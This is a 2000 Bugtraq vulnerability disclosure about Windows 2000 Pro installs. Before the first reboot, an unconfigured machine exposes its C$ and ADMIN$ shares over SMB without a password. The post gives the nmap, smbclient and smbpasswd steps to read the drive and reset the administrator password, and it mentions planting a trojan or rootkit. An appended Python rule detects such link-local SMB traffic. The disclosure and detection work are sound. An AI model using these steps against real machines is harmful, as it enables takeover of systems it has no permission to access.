From: Stephane Aubert [Stephane.Aubert@HSC.FR]
Sent: Wednesday, February 23, 2000 8:58 AM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: Windows 2000 installation process weakness

Hello,

As a lot of people asked me for information on the insecure win2k pro installation process, we wish to bring further information on this vulnerability. All these tests have been made and checked with Denis Ducamp and Alain Thivillon, 2 serious security experts.

What we have done:

1. Install the final release of win2k pro (build 2195).

2. Do not give any IP address during the install. If no DHCP server is responding, the win2k pro box takes 169.254.153.13 as IP address. (The address range used is 169.254.0.0/16, which is registered with the IANA as the LINKLOCAL net.)

   Notice: if a real IP address is given by the admin or a DHCP server, you can connect directly; jump to step 4 right now.

3. On your favorite Linux (or *BSD) box, add an alias to the interface:

   # ifconfig eth0:0 169.254.153.11

4. Just after the configuration of COM+ by win2k, you can ping or scan it:

   % nmap 169.254.153.13

   Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
   Interesting ports on (169.254.153.13):
   Port    State  Protocol  Service
   139     open   tcp       netbios-ssn

   # nmap -sU -p 1-200 169.254.153.13

   Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
   Interesting ports on (169.254.153.13):
   Port    State  Protocol  Service
   137     open   udp       netbios-ns
   138     open   udp       netbios-dgm

   Notice: the administrator has already entered a password!!!

5. By now, you can connect via SMB (smbclient for example) to the C$ or ADMIN$ share WITHOUT ANY PASSWORD!!! This lasts until win2k asks the admin to reboot the computer.

   Notice: it's possible to use NAT (NetBIOS Auditing Tool) to obtain the NetBIOS name of the Windows box and the shares.

   % ./smbclient //groar/c$ -I 169.254.153.13 -U administrator
   added interface ip=169.254.153.12 bcast=169.254.153.31 nmask=255.255.255.224
   Password:
   Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
   smb: \> ls
     IO.SYS         HSR    40992  Tue May 31 06:22:00 1994
     MSDOS.SYS      HSR    38166  Tue May 31 06:22:00 1994
     COMMAND.COM    R      56286  Tue May 31 06:22:00 1994
     WINA20.386     A       9349  Tue May 31 06:22:00 1994
     CONFIG.SYS     A        638  Fri Feb 18 15:34:00 2000
     AUTOEXEC.BAT   A        690  Fri Feb 18 15:33:10 2000

6. Worse! You can SET (remotely) a new administrator password:

   % ./smbpasswd -U administrator -r groar
   Old SMB password:
   New SMB password:
   Retype new SMB password:
   startsmbfilepwent: unable to open file /usr/local/samba/private/smbpasswd
   unable to open smb password database.
   Password changed for user administrator.

   By now, nobody - even the administrator - even after the reboot - can connect (remote or local) without the NEW password. The administrator has to crack his own computer ;-))

7. Worse! It is also (evidently) possible to transfer a trojan to the new computer, or just a rootkit (www.rootkit.com), in order to keep administrator privileges for a long time :(

Regards,
Stéphane

--
Stephane AUBERT -=- Herve Schauer Consultants
Stephane.Aubert@hsc.fr http://www.hsc.fr/
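The weakness described in the post has a clear network signature for a defender: a host that is still being installed has fallen back to the 169.254.0.0/16 link-local range and is already answering NetBIOS/SMB, and the only peers that can reach it are other link-local addresses on the same segment. On a network that does not rely on APIPA, any NetBIOS/SMB flow with a 169.254.x.x endpoint is therefore worth an alert. The detection rule below is an added example, not part of Stéphane's post or of any HSC tool. It assumes a simplified, constructed flow-record format; the ports 137/138/139 come from the post's nmap output, while 445 (direct-hosted SMB) is an extra assumption so the rule also covers SMB without the NetBIOS session layer. The sample records are constructed and only reuse the addresses quoted in the post.

```python
"""Flag NetBIOS/SMB flows that involve a link-local (169.254.0.0/16) address.

Constructed flow-record format (one flow per line):
    <timestamp> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# APIPA / IANA link-local range that an unconfigured Windows host falls back to.
LINK_LOCAL = ipaddress.ip_network("169.254.0.0/16")

# 137/138/139 are the ports the post shows; 445 (direct-hosted SMB) is an
# added assumption so the rule also covers SMB without the NetBIOS layer.
NETBIOS_SMB_PORTS = {
    ("udp", 137): "netbios-ns",
    ("udp", 138): "netbios-dgm",
    ("tcp", 139): "netbios-ssn",
    ("tcp", 445): "microsoft-ds",
}

FLOW_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>tcp|udp)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


@dataclass(frozen=True)
class Alert:
    ts: str
    src: str
    dst: str
    service: str
    reason: str


def parse_flow(line: str) -> Optional[dict]:
    """Parse one flow record; return None for lines that do not match."""
    m = FLOW_RE.match(line.strip())
    if m is None:
        return None
    try:
        src = ipaddress.ip_address(m["src"])
        dst = ipaddress.ip_address(m["dst"])
    except ValueError:
        return None  # malformed address, e.g. an octet above 255
    return {"ts": m["ts"], "proto": m["proto"], "src": src,
            "sport": int(m["sport"]), "dst": dst, "dport": int(m["dport"])}


def classify(flow: dict) -> Optional[Alert]:
    """Alert when a NetBIOS/SMB flow has at least one link-local endpoint."""
    service = NETBIOS_SMB_PORTS.get((flow["proto"], flow["dport"]))
    if service is None:
        return None
    src_ll = flow["src"] in LINK_LOCAL
    dst_ll = flow["dst"] in LINK_LOCAL
    if not (src_ll or dst_ll):
        return None
    if src_ll and dst_ll:
        reason = "both endpoints link-local: APIPA peer reaching an unconfigured host"
    elif dst_ll:
        reason = "NetBIOS/SMB service offered on a link-local address"
    else:
        reason = "link-local client talking to a configured NetBIOS/SMB server"
    return Alert(flow["ts"], str(flow["src"]), str(flow["dst"]), service, reason)


def scan_log(lines) -> List[Alert]:
    """Run the rule over flow records; unparsable lines are skipped."""
    alerts = []
    for line in lines:
        flow = parse_flow(line)
        if flow is None:
            continue
        alert = classify(flow)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample records reusing the post's addresses (not real traffic).
SAMPLE_LOG = [
    "2000-02-23T08:58:01 udp 169.254.153.11:137 -> 169.254.153.13:137",
    "2000-02-23T08:58:02 tcp 169.254.153.11:1034 -> 169.254.153.13:139",
    "2000-02-23T08:58:03 tcp 10.0.0.5:40000 -> 10.0.0.20:139",
    "2000-02-23T08:58:04 tcp 10.0.0.5:40001 -> 169.254.153.13:445",
    "2000-02-23T08:58:05 tcp 169.254.153.13:1035 -> 10.0.0.20:80",
    "not a flow record",
]

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a.ts} {a.src} -> {a.dst} [{a.service}] {a.reason}")
```

Of the six constructed records, three raise an alert (the two link-local-to-link-local NetBIOS flows and the routed connection to port 445 on the link-local host); ordinary SMB between configured 10.0.0.0/8 hosts, non-SMB traffic from the link-local host, and the unparsable line are ignored. The "both endpoints link-local" reason is the one that matches the post's scenario exactly, and the remedy it points at is the one the post implies: give the machine its address and firewall it off the segment before setup exposes a NetBIOS/SMB service.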